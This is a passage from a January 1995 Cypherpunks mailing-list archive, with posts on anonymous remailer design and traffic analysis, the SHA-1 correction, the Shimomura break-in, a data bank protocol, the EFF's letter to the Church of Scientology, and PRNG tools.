> compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
> like separate pgp packets, or packets it can't read, or something.) Under
> the current system, the precausion is entirely warranted.

I don't think so.  The problem with Miron's extropy remailer is that it
only passes through the contents of a PGP block.  For anonymous addresses
to work, the (chained,encrypted) address must be in a PGP block which
precedes the message body.  I don't see how any cutmarks idea would
affect this.

>     To make life even more fun, there is no good reason that non-remailers
> cannot be in on the action!  Alice, sending to Bob through Chaum, pretends
> to be a remailer.  That is, she prepares her message to Bob, (encrypted),
> and adds the Request-Remailing-To:  Bob@nowhere.org, and signs it.  She
> then observes that the message is too small, so she adds the Cutmarks:
> header, etc.  When Chaum receives the packet, he opens it, removes the
> cutmarks, and sees a signature he does not know.  Chaum then sends a
> request to pgp-key-server@omniscient.gov for the key, and holds the message
> until he gets it.  He then compares the address and name on the key
> recieved to the message.  The signature is good, so he is ready to send the
> packet to Bob.

Again, why does the remailer go to all this trouble to verify a
signature from Alice?  That sig is for Bob!  She may not even want to
post her public key for everyone; Bob may be the only one who has it.  I
don't understand why the remailer, which exists to hide identities, is
going to such trouble to verify them on its own.

> But Bob can be in on the game as well, since there is no
> reason that he cannot handle the Cutmarks:, the signature, and the nested
> encryption.  In fact, Alice could include a copy of Bob's key in the
> message for Chaum to use, after a Recipient-Key:  header.

Alice is the one who should encrypt the message for Bob, not the
remailer!  Are you suggesting that she should let the remailer see the
message contents?

> Bob can also
> verify that the message was actually routed through Chaum.

Why on earth does he care?  I really don't see what problem you are
solving here with all this checking.

> If Chaum is
> concerned that, at some future time, Eve might supeona his key ring in
> order to demonstrate that Alice and Bob are using Chaum, Chaum can
> alternately request keys that he does not need from the servers, and delete
> (older) keys in the ring.

Eve would be more likely to subpoena Chaum's secret key ring.  A public
key ring proves nothing.

>     In other words, if all the remailers can handle nested pgp packets and
> cutmarks, we are close to moving all small messages to a standard size.

This mostly makes sense (although as I said I prefer simply enhancing the
crypto program to take a parameter for output pad size) but I don't see
where all the rest of it came from.

>     What if the file is too big?
>  
>     If the file is too big, break it in pieces.  We need a header,
> Multipart Message:  n of m.  Note that since this is assumed to be _inside_
> a pgp wrapper, it is secure.  The recipient could hold and merge the files
> as needed.  If the message to be forwarded is too big, split and continue.
> Since the messages are ascii armored, the split/combine protocal is to
> concatenate.  Message parts could be made equal size to minimize the chance
> of a message barely bumping over the limit as it moves.  Of course, Alice
> could break her message to Bob directly, but we cannot assume that all
> would do this for us.

I believe Mixmaster provides a client mode to do this.  I prefer putting
more functionality in the hands of the users and not relying on kindly
old Uncle Remailer to do it for you.

>     This also means that if Alice sends a message to Bob in the clear
> through Chaum, and David, that the message will be encrypted from Chaum to
> David.  Thus, if Eve wants to know which message from Chaum to David is the
> one from Alice to Bob, (perhaps to know that it is _not_ the message from
> Frank she is interested in) she knows only that it was one of the messages
> from Chaum to David after Chaum got the message from Alice, and before
> David sent it to Bob.  While Chaum and David can both read the message, it
> still provides mixing capabilites inside the remailer net itself, and thus,
> some protection to Frank.  (Who apparently needs the help.)

This is a commonly made suggestion, but philosophically I am opposed.  We
got into this fix (lack of privacy) by letting people rely on others to
do things for them.  It's time for people to take responsibility on their
own.  The kind of thing you are suggesting provides the illusion of
privacy.  Never trust remailer operators!

>     A word on remailer keys:  Since pgp uses square-and-multiply for
> exponentiation, we see that the amount of work needed to sign a message is
> d(m) * (d(e) + o(e)) where d(m) is the digits of the modulous, d(e) digits
> of the exponent, and o(e) is the number of ones in e.  (I don't remember
> the technical term.) Since the public key is small, each of the parts of
> the private key will be large, BUT, there is no reason to assume that we
> cannot get lucky, and find an m such that d(e) + o(e) is much smaller than
> expected, (d(m) * 3/2, roughly) thus greatly reducing the system demand of
> the remailer.  In fact, it might be possible to move to 768-bit keys for
> those that have kept their sizes down in the past.  If pgp handles each
> prime separately, we look for a double-lucky modulous.  (And a source of
> random numbers that does not involve striking keys!)

Since the secret key d is effectively a random number from 0 to m, you
would have to create, say, 1000 key pairs to have a good chance of
finding a d that was as much as 10 bits shorter than m.  Then o(d) might
be 5 bits shorter.  So you'd be done from 768+384 to 758+379 or about a
1% reduction in time.  And it will take a while to generate 1000 keys.
To get a 2% reduction you would have to generate 1000000 keys.  I hope
you have a lot of time on your hands.

I'm sorry to have been so negative, but this message is part of a long
tradition advocating putting more responsibility into the remailer net.
I strongly feel that better solutions put power into the users' hands.
I oppose centralized solutions.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLyqgIRnMLJtOy9MBAQF1YAH/Yu68NkN0NnbCTfxDoGm4oc6lCs+dCp6V
pmjinw8zdwBM133eAaaorjtW0KhEvBNMGQTFHeiGJTOt94bE8ELB5g==
=owIt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 28 Jan 95 12:27:31 PST
To: cypherpunks@toad.com
Subject: Re: SHA Reference?
In-Reply-To: <9501281910.AA20923@snark.imsi.com>
Message-ID: <199501282027.MAA17185@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@imsi.com> writes:
> apparently also pre-correction. Anyone know the proper reference for
> the corrected text?

I append the latest reference I've seen, posted by Robert Perillo in Aug.
Check rand.org:pub/jim/sha.tar.gz for my latest C code.  An #ifdef will
select the broken or fixed versions.

	Jim Gillogly
	7 Solmath S.R. 1995, 20:25

----------------------------
Federal Register  07/11/94
Citation="59 FR 35317"

[Docket No. 940675-4175]
RIN 0693-AB33

Proposed Revision of Federal Information Processing Standard 
(FIPS) 180, Secure Hash Standard

AGENCY: National Institute of Standards and Technology (NIST), 
Commerce.

ACTION: Notice; Request for comments.

SUMMARY: A revision of Federal Information Processing Standard 
(FIPS) 180, Secure Hash Standard (SHS), is being proposed. This 
proposed revision corrects a technical flaw that made the standard 
less secure than had been thought. The algorithm is still reliable 
as a security mechanism, but the correction returns the SHS 
to the original level of security.

   The SHS produces a 160-bit output called a message digest 
for a message of any size. This message digest can be used with 
FIPS 186, Digital Signature Standard (DSS), to compute a signature 
for the message. The same message digest should be obtained 
by the verifier of the signature when the received version of 
the message is used as input to the Secure Hash Algorithm (SHA). 
--------------

         Proposed Modification of the Secure Hash Algorithm

In Section 7 of [1](page 9), the line which reads

    b) For t=16 to 79 let W(t) = W(t-3) XOR W(t-8) XOR W(t-14) XOR W(t-16).

is to be replaced by

    b) For t=16 to 79 let
                   W(t) = S1( W(t-3) XOR W(t-8) XOR W(t-14) XOR W(t-16) ).

where S1 is a left circular shift by one bit as defined
in Section 3 of [1](page 6), namely

S1(X) = (X<<1) V (X>>31).


ASCII translator's note : S1 is actually,  S superscript 1.
                          W(t-n) is actually, W subscript, t or t-n.



References:

    [1]  FIPS PUB 180; Secure Hash Standard
         Computer Systems Laboratory
         National Institute of Standards and Technology
         1993 May 11
_____________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crawford@scruznet.com (Michael D. Crawford)
Date: Sat, 28 Jan 95 12:58:29 PST
To: cypherpunks@toad.com
Subject: Re: NYT on Target Shimomura
Message-ID: <199501282058.MAA07046@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff <jya@pipeline.com> quotes the NYT quoting Tsutomu Shimomura:

>   "Looks like the ankle-biters have learned to read technical
>   manuals," Mr. Shimomura said derisively. "Somebody should
>   teach them some manners. "

Yeah, that's the Tsutomu I know.  We were classmates at CalTech back in the
early 80's.  Tsutomu has never been known to mince his words.

I'm completely dumbfounded that someone found a way to break into the
computer in Tsutomu's home.  _Firewalls and Internet Security_ mentioned
that he participated in tracking down the Berferd hacker that attacked Los
Alamos, Stanford and AT&T.  Perhaps this latest hacker is related, or was
inspired to try because Tsutomu was mentioned in the book.

When Tsutomu left CalTech after his sophomore year, it was to go to Los
Alamos to do research on using dedicated hardware for fluid dynamics
calculations.  His group made some headlines back then for designing a new
parallel processing machine that Tsutomu described as costing about as much
as a Cray, but performing about 1000 times as fast as a Cray for performing
the single, very widely used function of calculating turbulent fluid flow -
for anything from predicting the weather to designing fighter planes.

(He and I were physics majors, not computer science).

He later went to UC San Diego, where I understood he was doing some manner
of research in theoretical physics.  I've not heard much from him for a
while, though I went to visit him a few years ago, and got to play around
on the computer that got broken into (if it's the same one still around).
Funny thought - Tsutomu just logged me in and went off to sleep, leaving me
to do as I pleased.  I mostly played around with Sun's NeWS software.
Funny that someone else should cause nationwide headlines through coming in
unwelcomed.

Tsutomu is one smart dude.  I consider him among the most intelligent
people I've ever met - and I've met some smart people, working in the
physics community and the computer business.

It happens that I got better grades, overall, than he did at CalTech - but
this is because he spent much of his time off doing research rather than
concentrating on mundane things like sophomore mathematics.  When he did
leave, Lawrence Livermore, Cray and Los Alamos were competing for his
attention.  When I left not too long after, I was unable to get a job at
Taco Bell.  (I'm doing much better now, being well established as a Mac
programmer, and thinking of getting into Linux kernel hacking &
consulting).

Michael D. Crawford
crawford@scruznet.com
crawford@maxwell.ucsc.edu <- Finger me here for PGP Public Key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 28 Jan 95 13:20:04 PST
To: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Subject: Re: Identity
Message-ID: <ab5062d202021004146c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 5:04 PM 1/26/95, Matthew J Ghio wrote:
>Steve Orr <sorr@eznet.net> wrote:
....
> IP spoofing is, simply put, placing a fake return address on a packet,
> and pretending to be a authorized user on a computer system that you are
> not really on.  This is, basically, a high tech version of an old
> mail-fraud system:  Suppose you sent a letter to a corporation
....
Thanks for you excellent explanation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanagi.sbi.com>
Date: Fri, 27 Jan 95 20:30:01 PST
To: cypherpunks@toad.com
Subject: It's a Crusade ...
Message-ID: <Pine.SUN.3.91.950128131716.7053A-100000@doe174g>
MIME-Version: 1.0
Content-Type: text/plain


I've really been enjoying the traffic recently - this religious 'skirmish'
has generated nearly as much traffic as the Logo Wars. I do have my own
strong opinions about this particular subject, but I'm fighting back the
compulsion to fly, berserker like, into the fray. However, it might be
time to let it all lie for a while. This is, after all, a list for
cryptography. Users of all kinds/makes/manufacturers of computers need
good crypto software - so in that respect all contenders in this are equal. 

Ding Ding. Time out guys.

-Jon

--
  Jonathon Fletcher,
  jonathon@izanagi.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Sat, 28 Jan 95 11:08:15 PST
To: cypherpunks@toad.com
Subject: SHA Reference?
Message-ID: <9501281908.AA19911@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have the FIPS reference for the latest SHA? I'm writing up
the SHA-AH document and I find that I don't have such a reference --
the best I've got is 

"Proposed Federal Information Processing Standard for Secure Hash
Standard", Federal Register, v57, n21, 31 Jan 1992, p. 3747-3749

And I know that this has since been corrected.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 11:10:18 PST
To: cypherpunks@toad.com
Subject: Re: SHA Reference?
In-Reply-To: <9501281908.AA19911@webster.imsi.com>
Message-ID: <9501281910.AA20923@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I've since found a reference to NIST FIPS Pub #180, but this is
apparently also pre-correction. Anyone know the proper reference for
the corrected text?

.pm

Perry E. Metzger says:
> Does anyone have the FIPS reference for the latest SHA? I'm writing up
> the SHA-AH document and I find that I don't have such a reference --
> the best I've got is 
> 
> "Proposed Federal Information Processing Standard for Secure Hash
> Standard", Federal Register, v57, n21, 31 Jan 1992, p. 3747-3749
> 
> And I know that this has since been corrected.
> 
> Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 28 Jan 95 15:49:18 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <ab5087cb03021004c425@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Protocols for a Data Bank

The purpose of a data bank is to store large bodies of information for long
periods of time. I suggest here some protocols and contracts for a data
bank and its customers. We then discuss risks, incentives and
stratification of the data storage industry. These ideas implicitly rely on
several types of cryptography-- public key, secure hash, symmetric ciphers
and blind signatures. To explain these technologies here would
substantially obscure the presentation for those who know of such things
and help very little for those who don't.

Here are several transactions that a data bank engages in.

Acquire data: A client anonymously sends a collection of data along with
funds sufficient to warrant the bank's holding the data for a few days and
computing its secure hash. The bank knows the data only by its secure hash.

Selling Hat Checks: The bank will sell a hat check to anyone who will pay a
negotiated price. The hat check specifies the secure hash of the data, the
penalty to be paid upon failure to produce the data, and the cost of
redeeming the data. The hat check is signed blindly by the bank and is a
bearer instrument. Any holder of a hat check can present the check along
with the redemption fee and demand the data. The data bank must then either
produce the data or pay the penalty to the holder of the hat check. A
particular hat check is canceled whenever the bank pays the penalty like a
spent Chaum DigiCash note. The bank can sell multiple hat checks for the
same data. Different hat checks for the same data may specify different
penalties.

Sell a copy of an acquisition: Any one can request a piece of data
identified only by its secure hash. The bank is free to sell a copy of the
data to anyone with the secure hash. The bank sets the price.

Publish index: The bank can publish its list of hashes. (This makes data
hunters possible.)

Cancel a hat check: A holder of a hat check may sell it back to the bank at
a negotiated price thus releasing the bank from the threat of paying a
penalty in the future. This also allows the bank to retrieve the physical
storage where the data is stored if it is sure that it has not sold other
hat checks for the data.

The hat check may specify expiration dates, cancellation terms etc. The
bank is explicitly permitted to disseminate the data and may well do so to
lay-off risks. In this sense a data bank is like in insurance company that
spreads and shares risks. A hat check may be viewed as a life insurance
policy for the data.

Risks

Dividing trust may be done by agreeing on a notary. Upon redemption, for
instance, a trusted notary might examine the hat check, accept the payment
specified therein from the client, pass over the data on its way from the
bank to the client while computing the secure hash, and if the secure hash
matches that in the hat check, deliver the payment to the bank. The notary
need not have long term financial stability as must the bank.

Brokers may have an interface similar to a bank. They return baskets of hat
checks. This reduces the risk to the client that one of the data banks will
fail financially and be unable to pay the penalty. The broker need not be
financially stable.

Data Hunters can engage in knowing who has what data. Given a hash they can
tell you what banks have the data. This would presumably require a new
protocol with the bank. This might be the ultimate URL or URI server.

Inflation can damage incentives. Hat checks might be denominated in gold or
currency baskets or what ever.

RSA modulus size is critical for long term contacts. 2K bits of modulus or
more may be warranted.

Example

I can imagine the Getty Museum digitizing its Rembrandts and storing the
results in a data bank. The data might be insured for $100,000,000. The
bank would disseminate the data to increase security and lower its risk.
The museum would probably encrypt the data and share the key and hash ala
Shamir for safe keeping. The museum would not share the hat check because
it wants to be the one paid upon default.

Incentives

A data bank, or any other player, may find that keeping data profitable
beyond the point of any outstanding hat checks. It can make money by
supplying copies of the data in return for a fee plus secure hash. Indeed
new hat checks may be sold after the last had expired. Data banks thus have
an incentive to disseminate their list of holdings in the form of hashes,
as input to bounty hunters.

Design Considerations

It may seem strange that the data bank does is willing to sell data to who
ever will pay. I suggest that because it is so easy to encipher the data
and not have to trust the bank. You can distribute the key thru what ever
channels you transmit the secure hash of the data.

Note that bank clients are always anonymous. Data is never held for some
known person. Data may be held solely for speculation. The purpose of the
penalty is to motivate the bank to keep data for which there is no reason
to forecast sales revenue.

The Bank's State

Logically the bank can perform all of these transactions by merely keeping
the unordered set of acquisitions. It is practically necessary to index
these by their secure hash but this can be rebuilt on demand. It must keep
canceled hat checks lest it become liable to extra penalties. The bank need
not keep records of hat checks that it has sold unless it wants to know
when it can delete acquisitions. It may want to keep marketing information
to know when acquisitions are worth keeping merely to sell copies of.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam.philipp@ties.org (Adam Philipp)
Date: Sat, 28 Jan 95 13:15:45 PST
To: cypherpunks@toad.com
Subject: EFF letter to Church of Scientology (FWD)
Message-ID: <199501282112.QAA21853@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Stanton McCandlish <mech@EFF.ORG>
Subject: File 4--EFF Open Letter to Church of Scientology
Date: Mon, 23 Jan 1995 18:25:35 -0500 (EST)

*****POST FREELY AS APPROPRIATE*****

An Open Letter to the Church of Scientology (CoS) and the Net
from the Electronic Frontier Foundation (EFF)

Over the past several days, the Electronic Frontier Foundation
has received several reports from system administrators and
others about threats of lawsuits they have received from
attorneys for the Church of Scientology and the closely
associated Religious Technology Center and Bridge Publications,
Inc.  These threats apparently are designed to convince sysadmins
to discontinue the carriage of certain newsgroups that involve
discussions of the Church of Scientology and its teachings, solely
on the ground that some of the messages sent through these
newsgroups allegedly involve infringements of CoS copyrights or
other intellectual property rights.

EFF has also received a letter from CoS stating that it would
not use the threat of lawsuits against sysadmins if there were
any other way to deal with allegedly wrongful messages.

EFF believes there is a better way to deal with allegations of
wrongful messages -- and that using the threat of litigation to
shut down entire newsgroups, or to persuade sysadmins who
have not originated any allegedly wrongful messages to shut down
newsgroups, is itself highly inappropriate.

Electronic communications are in their infancy, and most of the
providers are not big corporations with substantial funds to
spend on expensive litigation, but rather small operators who
cannot afford protracted litigation, even if they are in the
right.  The mere threat of a lawsuit could result in some sysadmins
refusing to carry all sorts of contentious newsgroups simply because
they could not afford to put on a case to show that they should not
be held responsible for another party's alleged wrong.

Rather than attempting through threats of lawsuits to induce
innocent sysadmins to censor speech, Church members are
encouraged to participate in Usenet discussions to make their views
known and refute erroneous posts -- in other words, to answer
allegedly wrongful postings with more speech.  As U.S. Supreme Court
Justice Louis Brandeis articulated in 1927: "If there be time to
expose through discussion the falsehood and the fallacies, to avert
the evil by the processes of education, the remedy to be applied is
more speech, not enforced silence."  If CoS claims that a
copyright violation or other wrong not remediable by speech has
been perpetrated by a particular person, then it should confine
its legal threats to that person -- not direct them at an innocent
sysadmin who did no more than forward a message, and certainly
not at the innocent participants of a newsgroup seeking to exchange
views through the newsgroup channel. Even if CoS cannot determine
the identity of the person perpetrating an alleged wrong against it,
that provides no excuse for cutting off the free flow of information
over the net.

Events like these show us how important it is to search for new
paradigms for handling disputes that arise from time to time.
We think the better way to handle this dispute would be to
submit the claims and counterclaims to arbitration or
mediation, perhaps in a proceeding conducted over the net
among the parties to the newsgroup discussion. EFF offers its
services to help find an appropriate mediator or arbitrator
who would be available online for this purpose. Any party to
this dispute that refused to participate in such a forum would,
of course, have to explain why it had done so if a case were
brought in a more traditional court.

Meanwhile, we urge CoS to leave the innocent sysadmins out of
their fight.  We urge CoS not to take actions designed to cut off
the free flow of information through the net.  Where there are
legitimate disputes about particular messages or the wrongful
actions of particular individuals, those can and should be
addressed -- perhaps most efficiently through the new
communications medium itself.


The Electronic Frontier Foundation
1667 K St. NW, Suite 801
Washington DC 20006-1605 USA
+1 202 861 7700 (voice)
+1 202 861 1258 (fax)
+1 202 861 1223 (BBS - 16.8k ZyXEL)
+1 202 861 1224 (BBS - 14.4k V.32bis)
Internet: ask@eff.org
Internet fax gate: remote-printer.EFF@8.5.2.1.1.6.8.2.0.2.1.tpc.int

- -- ---------------------------------+------------------------------------------
|PGP Key available on the keyservers|GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+|
| PGP Encrypted E-mail welcome.     |UU+ US+ P+ 3 E N++ k- W++ M-- V po- Y++  |
|                                   |t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u**|
|SUB ROSA: Confidential, secret, not|h-- f++ r+ n+ y++--                      | 
|for publication.                   |[ For the geek impaired, a description ] |
- ------------------------------------+------------------------------------------

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyqzDioZzwIn1bdtAQGingF/TK6A/nChN15OtfVBsFz+arWW7x7n0EQ8
x7Bd8XLvBvvE0r1iU2YHNHPlu1ju6pyq
=OsP5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sat, 28 Jan 95 16:30:56 PST
To: cypherpunks@toad.com
Subject: Re: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <v0300110cab508e0f1717@[140.174.229.179]>
MIME-Version: 1.0
Content-Type: text/plain


>I posed this question in alt.wired. Am I missing something obvious as to
>why Wired (or magazines in general) don't do this to make subscribing
>easier?

Because if you saw the low-tech state of the Wired office you'd understand;
they're at capacity just opening envelopes and manually entering names and
addresses off the checques.  Visit them whenever you're in downtown San
Francisco.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Sat, 28 Jan 95 14:33:42 PST
To: cypherpunks@toad.com
Subject: Remailer Specs
Message-ID: <v01510101ab506828bb63@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        Since I have begun the project of writing the Remailer for the Mac,
I suddenly realized that I do not know exactly what is expected of it, and
therefore would like some pointers to the specs of a remailer (I have seen
references to padding and splitting but do not know what this is nor how to
implement it.)
TIA,
_jaeson
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyq4LEiLvmPjc4XdAQEcRQQArQ3UFgJaX98YtPTLrPYiYYykYHkm4j6W
y262PHcfRePP+rWxcpHIU/y7iwkGMerugHoP36HdMdD+utc+v1NFsmwHYaDoORtE
66xsFOn/XEYS8IBJG0KbnQKd2UO7YGcpso9VNMqLU1YT8Ne2vypL2AFQ7MC9UugZ
sJCEtZgCuH8=
=yR1Z
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Sat, 28 Jan 95 16:40:49 PST
To: cypherpunks@toad.com
Subject: Re: Protocols for a Data Bank
In-Reply-To: <ab5087cb03021004c425@DialupEudora>
Message-ID: <9501281639.ab19254@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sat, 28 Jan 1995 15:49:13 -0800
> From: norm@netcom.com (Norman Hardy)
>   [...]
> Selling Hat Checks: The bank will sell a hat check to anyone who will pay a
> negotiated price. The hat check specifies the secure hash of the data, the
> penalty to be paid upon failure to produce the data, and the cost of
> redeeming the data. The hat check is signed blindly by the bank and is a
                                              ^^^^^^^
> bearer instrument. Any holder of a hat check can present the check along
> with the redemption fee and demand the data. 

  Why in the world would the bank want to sign blindly?  The bank
would be undertaking an obligation of an unknown nature.  Would you
sign a blank check?  A blank contract?  I wouldn't.

  Unless the comunication mechanism ensures anonymity, the bank can
know who deposited what, and who 'withdrew' what.

j'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Sat, 28 Jan 95 08:48:55 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <0rYGKG.43O04O@pjl53ik.i-p.attmail.com>
MIME-Version: 1.0
Content-Type: text


Look at mpj/pub/pgcharge.zip in ftp.csn.ofg.  It was designed to do
that sort of thing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sat, 28 Jan 95 14:53:34 PST
To: cypherpunks@toad.com
Subject: Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9501281651.A2705-0100000@edwin.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
    Suppose Alice sends Bob a message e(M) through Chaum.  Eve, a stong
opponent, wants to trace the message.  She keeps track of all outgoing mail
from Alice, an MD5 hash of all incoming messages to Bob, and outgoing from
Bob.  Eve then sends Chaum e(M), and waits for a matching MD5 to Bob that
doesn't correlate to an outgoing MD5 from Bob.  (Eve knows that Bob is a
remailer.)
 
(Thanks to whoever came up with Eve.  I'm embarassed that I didn't think of
that trick.)
 
    Clearly, this generalizes.
 
 
 
    Gentlemen, I believe that I have just stumbled upon a strong proof of
the necessity of remailer auto-encryption of all messages.  Since the
session key is PRG, MD5 will change (a lot;).  Furthermore, remailer auto-
encryption allows the mailers to number their messages to each other.  A
low number means a re-transmit from the remailer, which is not possible,
unless some sort of ACK system is in place, and even then, would still
flag.  Of course, if the remailers _sign_ their messages (on the way out)
as well, you could compare the timestamps of the signatures with the
message itself.
 
 
 
- ---
 
    I also believe that the spammed remailer attack reveals another
important weakness:  if 50% of all mail leaving Alice during one tick goes
to Bob, then Eve can gain probablistic information about the messages that
Alice recieved, when attempting to trace a message through the net.  This
"attack" suggests a rational use of garbage:
 
    1) A remailer always sends at least as many messages as it recieves,
       _including junk_.
 
         This means that you don't have a system "mysteriously" recieving
         200 messages, and sending eight.
 
 
    2) A remailer always sends at least n messages per tick.  (n may vary
       between remailers.)
 
          If a remailer has very low traffic, that traffic is still
          protected.
 
    3) On a given tick, a remailer always sends the same number of messages
       to each other remailer.
 
          This eliminates the effectiveness of a spam hit on a remailer of
          an old message.
 
    4) Designated users of the net receive the same number of messages from
       each remailer each tick.  (Such users probably _send_ the same
       number of messages each tick, as well.  Note also that if some
       remailer is untrusted, that will be reflected by its always being
       sent garbage.)
 
          This puts the users "inside" the net.
 
    No, these axioms do not blow up the amount of garbage.  New messages to
the net displace garbage, unless they raise the maximum for the number
going to a particular remailer.
 
    This system also has the advantage of _immediately_ fully integrating
any new remailers.  New remailers don't have to build up their users in
order to be secure.
 
- ---
 
    By combining these two, I believe we can turn the remailer net into a
black box, including designated users.  A communication should be safe if
either end is in the black box.  I believe that "PGP only" is the only way
that remailers will be able to fulfill their potential.  It should also
increase the base of PGP users.
 
 
- ---
 
    I nominate the phrases "Execute plan X.", "I have the soveineers.",
"Your fried chicken is ready.", and "The NSA is a bunch of idiots." for
garbage.  If they ever attempt to prosecute, the have to reveal that they
broke IDEA or RSA to X digits.
 
___
 
 
    Note that the maintainence of an MD5 log of all messages by recipient
by the remailers can be used to kill primitive spam/bombs.
 
 
 
"PGP?"                        "ITAR!"                          "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyrUVnmgMs8UcStNAQH18wf/a4SSoew9TJeaLsGWg+rL6wqm2RStrdFI
XOULDD7e1yaYLBaovSz8BeNgHgW1UUAiKWWsl4rmVQ+QI1u2Oprgzo/mGy5qa1Bv
i2GK9yjRleypn06fOf9kS7lr8ACO71m+1L/HPz+NBlPCgg6hCaWSJfoJkSQ1cHYi
5SHCvn/s/zLypgxcbDNqDF3eBMgpYokhFFyoTeD8LfNEtqQB/EGOwMlsik9YaKGg
5djDfDBucRsWy1a7H9G/BPejacA7PsIBKIIjbsQbxqCIczjzPR75j69ypM1IAtow
kCwq6KH4d9dyKPaB5Q564LsDiEkrift+84/rADro6L5ppi4GG4PFmQ==
=NgpM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sat, 28 Jan 95 14:58:45 PST
To: cypherpunks@toad.com
Subject: PRNG conditioning
Message-ID: <199501282258.RAA28933@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I just posted:

From: cme@clark.net (Carl Ellison)
Newsgroups: sci.math,sci.math.num-analysis,sci.stat,sci.stat.math,comp.simulation,sci.crypt,sci.crypt.research
Subject: Pseudo-random number conditioning toolkit
Date: 28 Jan 1995 17:41:58 -0500

a pointer to my PRNG conditioning tools as UNIX processes, to be found
under:

	ftp://ftp.clark.net/pub/cme

These include:

1.	ranG
a PRNG (either MD5 or SWB [subtract-with-borrow]), seeded by stdin and
writing stdout;

2.	ranH
an MD5 conditioner (takes w bytes from stdin, writes 15 or 16 bytes to
stdout);

3.	ranM
algorithm M -- (cf., Knuth vol.2) -- fed by either an internal SWB
generator or a [pipe|file|device] whose name is given as a parameter.

----------------------------------------

4.	ranD
using DES to condition stdin to stdout isn't there, thanks to the ITAR.
I've sent a copy to Mark at ripem.msu.edu.

----------------------------------------

 - Carl



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Sat, 28 Jan 95 16:06:34 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
Message-ID: <v01510103ab507de1bbd9@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>ftp myriad.pc.cc.cmu.edu /pub/remailer
>ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer

Thanks for the sites, but after looking at them, I can say they will NOT
build in THINK C. But, They might help me figure out what to do with
Remailer (the Mac version I'm building).  Also, I'm not writing mine
in C, I'm doing it in Pascal, because 1) I have the TCP libraries for it and
2) I don't now C very well at all.

